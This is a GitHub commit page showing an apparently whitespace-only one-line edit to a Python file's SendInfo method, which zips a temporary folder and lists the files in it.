Skip to content

Commit

Permalink
Browse files Browse the repository at this point in the history
  • Loading branch information
Rdimo committed Nov 1, 2021
2 parents 1c6522f + 17f2654 commit 8521666
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion main.py
Original file line number Diff line number Diff line change
Expand Up @@ -259,7 +259,7 @@ def SendInfo(self):
self.zip(temp, new)
for dirname, _, files in os.walk(self.tempfolder):
for f in files:
self.files += f"\n{f}"
self.files += f"\n{f}"
n = 0
for r, d, files in os.walk(self.tempfolder):
n+= len(files)
Expand Down

0 comments on commit 8521666

Please sign in to comment.